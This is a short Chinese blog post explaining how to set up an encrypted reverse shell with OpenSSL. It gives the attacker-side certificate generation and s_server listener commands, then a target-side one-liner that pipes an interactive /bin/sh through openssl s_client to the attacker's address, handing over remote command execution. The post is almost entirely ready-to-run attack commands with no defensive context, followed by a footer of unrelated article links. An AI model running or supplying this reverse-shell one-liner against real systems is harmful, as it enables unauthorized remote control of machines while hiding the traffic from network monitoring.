使用OpenSSL的反弹shell

连人2023-10-13 15:21

1、攻击机生成证书:

powershell 复制代码 
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码 
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码 
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
武汉唯众智创10 小时前
网络安全教学升级!基于深度强化学习的动态对抗网络安全防护教学方案全解析
网络·人工智能·安全·web安全·生成对抗网络·网络安全
NewCarRen11 小时前
汽车蓝牙信息娱乐系统隐私风险:攻击分析与防御策略
网络安全·汽车
NewCarRen13 小时前
智能电动汽车网络安全与功能安全融合框架构建及验证
网络安全·汽车·汽车网络安全
WayneJoon.H15 小时前
Java反序列化 CC6链分析
java·安全·网络安全·cc链·反序列化
汤愈韬17 小时前
MSTP工作原理、MSTP配置案例、MSTP负载均衡
网络·网络安全
麦烤楽鸡翅1 天前
give_you_flag(攻防世界)
网络安全·信息安全·ctf·misc·杂项·攻防世界·二维码处理
云安全联盟大中华区2 天前
构建AI原生工程组织:关于速度、文化与安全的经验
人工智能·安全·web安全·网络安全·ai·ai-native
HaiLang_IT2 天前
【信息安全毕业设计】基于Bert和BiLSTM的Web应用安全防护系统研究
网络安全·bert·恶意请求检测
Whoami!2 天前
⸢ 拾陆-Ⅲ⸥⤳ 安全数智化建设:安全自动化平台(上)▸概述
网络安全·信息安全·安全自动化平台·原子能力
Whoami!2 天前
⸢ 拾陆-Ⅱ⸥⤳ 安全数智化建设:安全大数据平台
网络安全·信息安全·安全大数据
热门推荐
01GitHub 镜像站点02今天 Cloudflare 全球事故,连 GPT 和你的网站都一起“掉线”了03UV安装并设置国内源04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05BongoCat - 跨平台键盘猫动画工具06Linux下V2Ray安装配置指南07全球最强模型Grok4,国内已可免费使用!(附教程)08Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南09Valdi:Snapchat 开源的新一代跨平台 UI 框架10Labelme从安装到标注:零基础完整指南